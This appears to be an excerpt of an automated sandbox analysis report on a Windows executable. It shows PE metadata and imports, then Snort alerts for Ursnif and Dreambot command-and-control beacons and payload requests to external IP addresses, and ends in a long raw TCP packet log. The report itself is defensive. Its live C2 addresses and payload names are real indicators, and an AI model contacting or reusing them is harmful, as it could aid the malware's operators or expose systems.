                                                        .rsrc0x620000x9f280xa000False0.602783203125data6.51663069246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x6c0000x132e0x2000False0.219360351562data3.73577949218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_BITMAP0x623600x666dataEnglishUnited States
                                                        RT_ICON0x629c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                        RT_ICON0x672280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                                                        RT_ICON0x697d00xea8dataEnglishUnited States
                                                        RT_ICON0x6a6780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x6af200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                        RT_DIALOG0x6b4880xb4dataEnglishUnited States
                                                        RT_DIALOG0x6b5400x120dataEnglishUnited States
                                                        RT_DIALOG0x6b6600x158dataEnglishUnited States
                                                        RT_DIALOG0x6b7b80x202dataEnglishUnited States
                                                        RT_DIALOG0x6b9c00xf8dataEnglishUnited States
                                                        RT_DIALOG0x6bab80xa0dataEnglishUnited States
                                                        RT_DIALOG0x6bb580xeedataEnglishUnited States
                                                        RT_GROUP_ICON0x6bc480x4cdataEnglishUnited States
                                                        RT_VERSION0x6bc980x290MS Windows COFF PA-RISC object fileEnglishUnited States

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllEraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
                                                        OLEAUT32.dllGetRecordInfoFromTypeInfo, LoadTypeLibEx
                                                        USER32.dllDefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
                                                        GDI32.dllExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
                                                        ADVAPI32.dllEnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
                                                        msvcrt.dllstrcoll, fgetwc, srand

                                                        Version Infos

                                                        DescriptionData
                                                        LegalCopyright A Company. All rights reserved.
                                                        InternalName
                                                        FileVersion1.0.0.0
                                                        CompanyNameA Company
                                                        ProductName
                                                        ProductVersion1.0.0.0
                                                        FileDescription
                                                        OriginalFilenamemyfile.exe
                                                        Translation0x0409 0x04b0

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        05/04/22-16:19:17.575336 05/04/22-16:19:17.575336TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976180192.168.2.4185.189.151.28
                                                        05/04/22-16:21:22.118696 05/04/22-16:21:22.118696TCP2823044ETPRO TROJAN W32.Dreambot Checkin4982480192.168.2.413.107.43.16
                                                        05/04/22-16:19:19.326271 05/04/22-16:19:19.326271TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976180192.168.2.4185.189.151.28
                                                        05/04/22-16:18:57.385228 05/04/22-16:18:57.385228TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975980192.168.2.413.107.42.16
                                                        05/04/22-16:21:20.986284 05/04/22-16:21:20.986284TCP2031743ET TROJAN Ursnif Payload Request (cook32.rar)4982380192.168.2.4193.56.146.127
                                                        05/04/22-16:21:21.354584 05/04/22-16:21:21.354584TCP2031744ET TROJAN Ursnif Payload Request (cook64.rar)4982380192.168.2.4193.56.146.127
                                                        05/04/22-16:21:23.154439 05/04/22-16:21:23.154439TCP2823044ETPRO TROJAN W32.Dreambot Checkin4982580192.168.2.4116.121.62.237
                                                        05/04/22-16:19:18.765869 05/04/22-16:19:18.765869TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976180192.168.2.4185.189.151.28
                                                        05/04/22-16:21:35.078524 05/04/22-16:21:35.078524TCP2831962ETPRO TROJAN Ursnif Variant CnC Beacon 8 M14983680192.168.2.4116.121.62.237
                                                        05/04/22-16:21:37.325898 05/04/22-16:21:37.325898TCP2831962ETPRO TROJAN Ursnif Variant CnC Beacon 8 M14984580192.168.2.4116.121.62.237

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 4, 2022 16:19:17.505877018 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.523657084 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.523854017 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.575335979 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.592833042 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863269091 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863297939 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863313913 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863331079 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863353014 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863365889 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863445997 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.863502026 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.863687038 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863704920 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863718033 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.863744020 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.863791943 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.864097118 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864162922 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.864460945 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864502907 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864517927 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864530087 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.864547968 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.864698887 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.864758015 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880639076 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880717993 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880748987 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880790949 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880830050 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880834103 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880861998 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880893946 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880903006 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880928040 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880942106 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880959034 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.880970001 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.880997896 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881022930 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881076097 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881222963 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881249905 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881289959 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881290913 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881331921 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881340981 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881359100 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881400108 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881412983 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881441116 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881459951 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881469011 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881531000 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881548882 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881589890 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881609917 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881639957 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881680012 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881690979 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881709099 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881742954 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881747961 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881787062 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881808043 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881818056 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881844044 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881858110 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881900072 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881922007 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.881927967 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.881958961 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898247957 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898296118 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898322105 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898355961 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898389101 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898412943 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898459911 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898541927 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898549080 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898578882 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898673058 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898674965 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898701906 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898772001 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.898889065 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898930073 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898955107 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.898988008 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899008036 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899019003 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899024010 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899049997 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899082899 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899107933 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899120092 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899142027 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899166107 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899194956 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899280071 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899641991 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899684906 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899720907 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.899748087 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.899867058 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900424004 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900542021 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900691986 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900732994 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900765896 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900778055 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900790930 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900811911 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900827885 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900847912 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900861979 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900896072 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900929928 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900932074 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900943041 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900947094 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.900957108 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.900994062 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901010036 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901045084 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901077032 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901078939 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901107073 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901112080 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901134968 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901137114 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901164055 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901170969 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901206970 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901228905 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901242018 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901264906 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901274920 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901299953 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901304960 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901331902 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901433945 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901499987 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901530027 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901592970 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901602983 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901659966 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901671886 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901701927 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901731968 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901735067 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901768923 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901789904 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901803017 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901839018 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901843071 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901854992 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901864052 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901890039 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901897907 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901932955 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901947975 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.901957989 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.901983976 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.915769100 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915822983 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915853977 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915888071 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915920019 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915951014 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915952921 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.915982008 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.915994883 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916004896 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916037083 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916064978 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916069984 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916083097 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916100979 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916134119 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916156054 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916187048 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916191101 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916198969 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916203976 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916218996 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916240931 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916243076 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916261911 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916273117 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916306973 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916325092 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916337967 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916361094 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916373014 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916392088 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916405916 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916426897 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916429043 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916457891 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916502953 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916563034 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916565895 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916604996 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916613102 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916646004 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916654110 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916691065 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916704893 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916723013 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916765928 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916815996 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916861057 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916893959 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916897058 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916925907 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916933060 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916956902 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.916956902 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916975021 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.916990042 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.917010069 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.917011023 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.917032957 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.918045998 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918085098 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918109894 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918145895 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.918173075 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.918689966 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918735981 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918778896 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918781042 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.918802977 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.918818951 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918823004 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.918862104 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918870926 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.918900967 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918911934 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.918927908 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.918951988 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.918967962 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919008970 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919015884 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919050932 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919056892 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919095039 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919101954 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919133902 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919143915 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919174910 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919183969 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919203043 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919224024 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919241905 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919284105 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919289112 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919325113 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919338942 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919368029 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919383049 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919411898 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919433117 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919450998 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919460058 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919480085 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919503927 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919519901 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919560909 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919578075 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919601917 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919644117 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919668913 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919680119 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919687033 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919697046 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919728994 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919748068 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919769049 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919783115 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919800043 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919826031 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919843912 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919883966 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919895887 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919926882 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:17.919939995 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:17.919969082 CEST8049761185.189.151.28192.168.2.4
